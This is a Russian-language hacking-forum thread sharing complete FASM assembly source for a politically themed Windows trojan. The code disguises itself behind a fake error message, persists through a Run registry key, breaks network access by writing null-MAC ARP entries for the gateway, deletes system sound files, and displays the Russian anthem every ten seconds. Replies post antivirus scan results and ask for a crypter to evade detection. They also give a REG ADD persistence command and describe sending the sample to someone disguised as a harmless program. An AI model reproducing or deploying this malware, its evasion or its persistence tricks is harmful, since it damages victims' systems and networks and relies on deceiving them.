• Привет !

    На форуме есть зеркало в ТОРе:rusfwz3cukdej7do.onion

    Обратная связь:info@ru-sfera.org

    Всего доброго !

Националистический вредонос [FASM] (1 Viewer)

Кто просматривает этот контент: "Тема" (Всего пользователей: 0; Гостей: 1)

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
Копирую статью с fuckav.ru
Хай всем, может кому надо, может у кого есть знакомые из стран ЕС или НАТО.

В свете недавних событий написал зверька с таким функционалом:

I при старте:
* Установка в папку Temp и ожидание перезагрузки
* После установки выводит сообщение об ошибке
II После перезагрузки:
* Херит ARP кэш, добавляя статичные записи для шлюза на мак адрес 00:00:00:00:00:00
* Удаляет звуковые файлы Windows
* Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

Особенности:

* Использование виртуальной памяти для массивов, поэтому весит всего лишь 3,5 КБ ( из-за текста гимна России внутри )

Как видите, основная фишка в :

Каждые 10 секунд выводит файл с текстом гимна Российской Федерации, на английском.

Можно сильно разозлить, или обидеть, западных соседей.
Код:
include 'win32ax.inc'
 
section '.data' data readable writeable
MasAddr dd 0
TempAddr dd 0
WinAddr dd 0
RussiaAddr dd 0
FileName db 'std.exe',0
AutoKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0
ValueName db 'stdcall',0
ErrorMessage db 'An error occurred during initialization the program',0
ErrorTitle db 'Fatal Error',0
hkey dd ?
hFile dd 0
open	db 'open',0
cmd	db 'cmd.exe',0
 
proc	CommandExecution CommandAddr : DWORD
jmp @@100
@@100:
push	SW_HIDE
push	[WinAddr]
push	[CommandAddr]
push	cmd
push	open
push	0
call	[ShellExecute]
ret
endp
 
section '.code' code readable executable
start:
 
invoke  VirtualAlloc, 0, 1280, MEM_COMMIT, PAGE_READWRITE
 
mov	[MasAddr], eax
mov	[TempAddr], eax
add	[TempAddr], MAX_PATH
inc	[TempAddr]
push	MAX_PATH
push	[MasAddr]
push	0
call	[GetModuleFileName]
 
 
push	[TempAddr]
push	MAX_PATH
call	[GetTempPath]
 
push	FileName
push	[TempAddr]
call	[lstrcat]
 
push	[MasAddr]
push	[TempAddr]
call	[lstrcmpi]
test	eax, eax
je	  @@10
 
push	0
push	[TempAddr]
push	[MasAddr]
call	[CopyFile]
 
invoke RegCreateKeyEx, HKEY_CURRENT_USER,AutoKey,NULL,NULL,NULL,KEY_ALL_ACCESS,NULL,hkey,NULL
invoke lstrlen, [TempAddr]
invoke RegSetValueEx,[hkey],ValueName,NULL,REG_SZ,[TempAddr],eax
invoke RegCloseKey,[hkey]
 
push	MB_ICONERROR
push	ErrorTitle
push	ErrorMessage
push	0
call	[MessageBox]
 
push	0
call	[ExitProcess]
 
@@10:
mov	eax, [MasAddr]
mov	ebx, 256
imul	ebx, 2
inc	ebx
add	eax, ebx
mov	[WinAddr], eax
push	MAX_PATH
push	[WinAddr]
call	[GetWindowsDirectory]
jmp	@@20
command_1 db '/c arp -d *',0
command_2 db '/c arp -s 192.168.1.1 00:00:00:00:00:00',0
command_3 db '/c arp -s 192.168.0.1 00:00:00:00:00:00',0
command_4 db '/c del %SystemDrive%\Windows\Media\*.wav /Q /S',0
file_1_:
file_1 file 'anthem.txt'
file_1_sz dd $ - file_1_
AnthemName db 'anthem.txt',0
@@20:
lea	eax, [command_1]
push	eax
call	CommandExecution
 
push	1000
call	[Sleep]
 
lea	eax, [command_2]
push	eax
call	CommandExecution
 
lea	eax, [command_3]
push	eax
call	CommandExecution
 
lea	eax, [command_4]
push	eax
call	CommandExecution
 
mov	eax, [WinAddr]
add	eax, 256
inc	eax
mov	[RussiaAddr], eax
 
push	[RussiaAddr]
push	MAX_PATH
call	[GetTempPath]
push	AnthemName
push	[RussiaAddr]
call	[lstrcat]
 
invoke  CreateFile, [RussiaAddr], GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL
mov	[hFile], eax
invoke  WriteFile, [hFile], file_1, [file_1_sz], esp, 0
push	[hFile]
call	[CloseHandle]
 
xor	ebx, ebx
@@30:
 
push	SW_SHOW
push	ebx
push	ebx
push	[RussiaAddr]
push	open
push	ebx
call	[ShellExecute]
 
push	10000
call	[Sleep]
jmp @@30
 
.end start
Название файла:[/B] Cyb.exe
Размер файла: 3584 байт
Дата сканирования: Tue, 03 Jun 14 11:14:35 -0400
MD5-хэш файла: cb80a0e5201b2be5d70a29de5dd8154b

Результат: 6 из 38

Ad-Aware: OK
AhnLab V3 Internet Security: OK
ArcaVir: OK
Avast: OK
AVG: OK
Avira: TR/ATRAPS.Gen Trojan!
Bitdefender/BullGuard: OK
BullGuard Internet Security 2013: OK
ClamAV (UNIX version): PUA.Win32.Packer.PrivateExeProte-15
Comodo: OK
Dr.Web: OK
Emsisoft Anti-Malware (a-squared Anti-Malware): OK
eScan Internet Security Suite 14: OK
Fortinet 5: OK
F-Prot: Malware detected
F-Secure 2014: OK
G Data: OK
IKARUS: OK
Immunet: OK
K7 Ultimate: OK
Kaspersky Internet Security 2014: HEUR:Trojan.Win32.Generic
McAfee Total Protection 2013: OK
Microsoft Security Essentials: OK
NANO: OK
NOD32: OK
Norman: OK
Norton Internet Security: OK
Outpost Security Suite Pro 8.0: OK
Panda Antivirus: OK
Quick Heal: OK
Sophos: OK
SUPERAntiSpyware: OK
Total Defense Internet Security: OK
Trendmicro Titanium Internet Security: OK
Twister Antivirus 8: Suspicious:Worm.Palevo.jub.zxfk.mg
VBA: BScope.Dropper.Gen.16
VIPRE Internet Security 2013: OK
Virit: OK]
Файл anthem.txt:
Код:
Russia – our sacred homeland,
Russia – our beloved country.
A mighty will, great glory –
These are your heritage for all time!
 
Be glorious, our free Fatherland,
Age-old union of fraternal peoples,
Ancestor-given wisdom of the people!
Be glorious, our country! We are proud of you!
 
From the southern seas to the polar lands
Spread are our forests and fields.
You are unique in the world, one of a kind –
This native land protected by God!
 
Wide spaces for dreams and for living
Are opened for us by the coming years
Our loyalty to the Fatherland gives us strength.
Thus it was, thus it is and thus it always will be!
Кидаете файл в папку с исходником.

P.S. Если хотите другой текст, то просто измените содержимое anthem.txt =)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
Интересная задумка, сейчас глянул, но немножко переделал:

1)При заражении выводит надпись по русски "Привет из России !"

2)После заражения сразу выводит гимн в цикле с задержкой 10 секунд

3)Гимн в теле программы, а не в файле...

4)Удалил все вредоносные функции, т.к. толку от них...

Но всё равно:https://www.virustotal.com/ru/file/...66e9016eb72aa54cbee19ebb/analysis/1402034706/

Похоже реагирует на API винды !Отдыхай!!!

Пароль:111, в архиве и компилятор FASM !
 

Вложения

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
456
И всё-таки она наша wink1- наша Раша)
Только пришлось защитника отключить, который сразу при запуске хотел съесть весь патриотизм) а антивирус на виртуалке не установлен.

раша.jpg
 

wixless

Уважаемый пользователь
Форумчанин
Регистрация
31.03.2013
Сообщения
30
Репутация
1
Нужно бы еще найти хороший криптор, чтобы не распознавался антивирусами)
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
Нужно бы еще найти хороший криптор, чтобы не распознавался антивирусами)
Эх, зачем-же его криптовать-то, если при включенном UAC он даже не сможет добавится в автозапуск...

Вот пять минут затратил, накидал:

1)Будет повышать себе прова при попытке добавить в автозапуск;

2)Реализовал проигрывание гимна любэ;

3)Гимн в ресурсах....

В общем-то копируется в темп, если первый раз запущен, добавит себя в автозапуск, попробует повысить права до админа, ну и далее будет проигрывать гимн + окошко...

Накидал на делфи т.к. с асмом некогда разбираться, вес увеличился т.к. делфи + гимн в экзешнике...

Пароль:111
 

Вложения

Антоха

Уважаемый пользователь
Форумчанин
Регистрация
26.12.2012
Сообщения
2 780
Репутация
4 774
если при включенном UAC он даже не сможет добавится в автозапуск...
Отчего же?На семёрке с включённым UAC,после перезагрузки окошечко вылазит.NIN@ немного умолчала как этот вредонос очутился у неё)Думаю она не обидится если я скажу.Я ей послал набросок одной прожки,но так как на компе дохера всяких папок с именем project,то вместо "хорошей" проги прислал ей этого нациста.Сказал можешь смело запускать на основной.Правда каспер задавил его втихаря.
В архиве батник-противоядие против этого вредоноса)Запускать от админа.
 

Вложения

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
UAC блокирует доступ в реестре, для доступа нужны админские права-же !

Так-же на 8-ке блокируется доступ на диск С, кроме пользовательской папки и служебных папок типа темп и т.д.

Поэтому доступ к ветке 'Software\Microsoft\Windows\CurrentVersion\Run' должна блокироваться UAC если он включон, либо я что-то не понимаю !Не въехал!!!
 

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
Всё разобрался, что-бы добавить при включонном UAC можно не повышать себе права, достаточно использовать ветку HKEY_CURRENT_USER

Код:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Вот поправил, проверьте на 8-ке, для интереса !

Он ничего не делает, добовляется в автозапуск + окошко гимна и музыка, окошко не закрыть будет, гы-гы...

Процедура лечения очень простая, прибить процесс + удалить из автозапуска и всё !WinkSmile

Пароль:111
 

Вложения

X-Shar

:)
Администрация
Регистрация
03.06.2012
Сообщения
5 382
Репутация
7 876
Telegram
Сам проверил, да всё работает...:utenok:


Это для меня открытие, будет запуск для конкретного пользователя !WinkSmile


Что делает программа, при запуске проверяет есть-ли файл start.bat, в папке темп, если нет то создаёт его с таким содержимым:
Код:
REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "chost" /t REG_SZ /d "C:\Users\Пользователь\AppData\Local\Temp\Project2.exe" /f>nul
+ копируется в папку темп

Далее запускает батник, т.е. добовляет себя в автозапуск и начинает проигрывать музыку + навязчиво открывает окно с гимном !Dmeh-Smeh-Smeh!!!

Далее при каждом старте ничего не делает, а просто запускается и проигрывает гимн + незакрывающееся окно, такая программа-шутка получилась, защитник вроде не палит, остальные АВ не знаю...like it
 

NIN@

Уважаемый пользователь
Форумчанин
Регистрация
26.03.2014
Сообщения
345
Репутация
456
На 8-ке всё отлично запустилось, защитник молчал, антивируса там нет 2.png, а на основную только скачала, Каспер начал сразу ругаться
националист.jpg
и не дал даже извлечь из архива, сразу удалил.